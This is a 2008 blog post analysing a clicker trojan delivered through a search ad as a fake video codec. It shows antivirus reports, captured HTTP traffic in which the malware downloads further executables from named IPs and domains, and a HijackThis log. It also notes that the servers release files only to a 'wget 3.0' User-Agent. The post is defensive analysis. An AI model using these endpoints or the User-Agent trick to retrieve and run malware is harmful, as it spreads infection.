Friday, November 21st, 2008 / 5,470 views

Trojan.Clicker served through beedly.us ADS

   

Today, while I was searching in beedly.us, I found this ADS:

 

Suspicious Advertisement

 

Why I get porn when I search for “free online virus” ?

 

I followed the ADS to analyze it, and I arrived at a fake porn site that contains in the HTML some malicious code that was designed to trick the user into downloading a so-called “codec”.

 

This is the virus scanner report for v-codec.1181_exe:

Report Generated 21.11.2008 at 20.17.23 (GMT 1)
Filename: v-codec.1181_exe
File size: 51 KB
MD5 Hash: 9C647C677459F4BB0A5C713FC22CBE2D
SHA1 Hash: 771FB9120A2A5F2C4952DB76B5D4D04ADAC825DF
CRC32: 3626635896
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 2 on 23

 

Antivirus Result
a-squared -
Avira AntiVir -
Avast Win32:Trojan-gen {Other} (0)
AVG -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA Win32:Trojan-gen {Other} B
IkarusT3 -
Kaspersky -
McAfee -
NOD32 v3 -
Norman -
Panda -
QuickHeal -
Solo Antivirus -
Sophos -
TrendMicro -
VBA32 -
VirusBuster -

I have analyzed v-codec.1181.exe, and after its execution I started to receive some traffic with the domain:

1

dsfcdasfvdsfdsf.com

Internet traffic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

GET /file989.php?id=3504966279&adv=1181 HTTP/1.1
User-Agent: wget 3.0
Host: dsfcdasfvdsfdsf.com
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
 
af
hxxp://69.46.24.95/addon/video1181.cfg
hxxp://lyox-lib.com/addon/video1181.cfg
hxxp://78.157.143.164/addon/video1181.cfg
hxxp://85.92.157.141/plus/offersfortoday/get_file.php
 
0
 
GET /script989.php?id=3504966279&adv=1181 HTTP/1.1
User-Agent: wget 3.0
Host: dsfcdasfvdsfdsf.com
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
 
0

I tried to download that files, but it seems they check the User-Agent, and if it is “User-Agent: wget 3.0″ it will let you download the files, else it will refuse the connection.

 

After some time new files were created:

1
2

%USer%\Desktop\26.exe (Undetected)
%USer%\Desktop\video.cfg (Trojan-Dropper - Ikarus)

After their execution another files were dropped in system32:

 

Files dropped in system32

 

And after, I got new traffic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

GET /bc/ads/728x90/4911a067982da.html HTTP/1.1
Referer: hxxp://s2.offersfortoday.com/bc/1oft.php
Accept-Language: en-us
Host: s2.offersfortoday.com
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 21 Nov 2008 10:50:18 GMT
Server: Apache/2.2.8 (Fedora)
Content-Length: 597
Connection: close
Content-Type: text/html; charset=UTF-8
 
...
 
POST /bc/1oft.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Host: s2.offersfortoday.com
Content-Length: 124
Connection: Keep-Alive
 
...
 
HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 1750
Connection: close
Content-Type: text/html; charset=UTF-8
 
...
...

And after I got some new interesting traffic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

GET /icons/logo.gif HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 193.142.244.49
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Date: Fri, 21 Nov 2008 11:12:39 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.6
Content-Disposition: attachment; filename=fileng.gif
Content-Length: 85504
Connection: close
Content-Type: application/octet-stream
X-Pad: avoid browser bug
 
.....

Lets scan the logo.gif:

Report Generated 21.11.2008 at 20.42.52 (GMT 1)
Filename: logo_gif
File size: 83 KB
MD5 Hash: DFEB72EAABE0C3B7588874D90E8DA844
SHA1 Hash: 83FA80CAC59736B86D4036C511B408609F911D7E
CRC32: 902639292
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 1 on 23

 

Antivirus Result
a-squared -
Avira AntiVir -
Avast -
AVG -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
Ewido -
F-PROT 6 -
G DATA -
IkarusT3 -
Kaspersky -
McAfee -
NOD32 v3 -
Norman Aggressive commersial W32/FakeAlert.VA ()
Panda -
QuickHeal -
Solo Antivirus -
Sophos -
TrendMicro -
VBA32 -
VirusBuster -

Look like a virus!

 

After, I got new traffic:

1
2
3
4
5
6
7
8
9
10
11
12

GET /plus/offersfortoday/get_file.php HTTP/1.1
User-Agent: wget 3.0
Host: 85.92.157.141
Cache-Control: no-cache
 
HTTP/1.1 302 Found
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11
Location: multi/2.exe
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
...

Another .EXE file will be downloaded and executed:

1

Location: multi/2.exe

Internet traffic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

GET /plus/offersfortoday/multi/2.exe HTTP/1.1
User-Agent: wget 3.0
Host: 85.92.157.141
Cache-Control: no-cache
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Date: Fri, 21 Nov 2008 11:18:51 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11
Accept-Ranges: bytes
Content-Length: 551125
Connection: close
Content-Type: application/x-msdos-program
 
...
 
GET /s3.offersfortoday.com/get_file.php HTTP/1.1
Accept-Encoding: gzip, deflate
Host: 77.245.61.232
Connection: Keep-Alive
 
HTTP/1.1 403 Forbidden
Date: Fri, 21 Nov 2008 11:19:44 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch10
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1
 
...

And after I got new traffic with a new domain:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

GET /install.php?hwid=xxx&aff=searchersmart HTTP/1.1
Host: searchersmart.com
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Server: Apache/1.3.36 (Unix) PHP/5.1.6
X-Powered-By: PHP/5.1.6
Connection: close
Transfer-Encoding: chunked
Content-Type: text/xml
 
...
 
GET /cset.php?id=xxx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: XML
Host: last-visit.com
Connection: Keep-Alive
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Date: Fri, 21 Nov 2008 11:19:51 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.6 with Suhosin-Patch
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/xml; charset=UTF-8
 
ENCRYPED DATA

And again another new .EXE was downloaded and executed:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

GET /perce.php?xxx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: XML
Host: 193.142.244.29
Connection: Keep-Alive
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch
Content-Disposition: attachment; filename=perce.php
Content-Length: 97280
Connection: close
Content-Type: application/octet-stream
 
...

The file perce.php in real is an executable file.

 

I got more traffic with previous domain:

1
2
3
4
5
6
7
8
9
10
11

GET /images/item_eele.gif HTTP/1.1
Host: 193.142.244.55
Cache-Control: no-cache
 
HTTP/1.1 200 OK
Server: Apache/1.3.37 (Unix) PHP/5.2.6
Content-Disposition: attachment; filename=item.gif
Content-Length: 131076
Connection: close
Content-Type: application/octet-stream
...

And also this .GIF file:

Content-Disposition: attachment; filename=item.gif

In real is an executable file that is detected from Avira as TR/Dropper.Gen. The story is not yet finished! After some time, some messages appeared on the screen:

 

Alert messages

 

Alert messages of Antivirus 2009

 

I noticed a new file was created in the system that looks like the setup of the well known and famous rogue security software Antivirus 2009:

 

Antivirus 2009 setup file

 

Below there is an image of the files created in my system:

 

Files created in the system

 

And finally this is the log of HijackThis with the traces of the malware:

Running processes:
C:\WINDOWS\System32\regsvr32.exe
%User%\Desktop\video.exe
C:\Program Files\Internet Explorer\iexplore.exe
%User%\LOCALS~1\Temp\~tmpc.exe

 

O2 – BHO: XML module – {500BCA15-57A7-4eaf-8143-8C619470B13D} – C:\WINDOWS\system32\msxml71.dll
O2 – BHO: searchersmart search enhancer – {700A0D5E-225D-3C33-ACDF-4AEEE0C48457} – C:\WINDOWS\system32\csfidvimyk.dll
O2 – BHO: offersfortoday browser enhancer – {E6605557-A595-E813-0A66-1AD6B5FC5928} – C:\WINDOWS\system32\advnpzdvsgjwkm.dll
O4 – HKLM\..\Run: [jlmnoczzqqe] C:\WINDOWS\System32\regsvr32.exe /s “C:\WINDOWS\system32\advnpzdvsgjwkm.dll”
O4 – HKCU\..\Run: [MSFox] %User%\Desktop\video.exe

Posted by admin on Friday, November 21st, 2008 at 8:11 pm and filed under Malware Analysis with tags , , , , . You can leave a response, or trackback from your own site.

Related Articles

2 Approved Responses so far

  1. Nykô Says:
    December 9th, 2008 at 9:15 am

    Hi Robert,
    Avast found it on my computer. I asked Avast to stop the connection and erase the files. However, from that day, each time I use the computer Avast detects again the trojan. How can I make sure I get rid of it?

    Thanks,

  2. Robert Says:
    December 9th, 2008 at 2:23 pm

    Hey Nykô,

    download HiJackThis, scan your pc and send to my email the log file, so i can tell you how to remove the trojan files.

    -Robert

Leave a Reply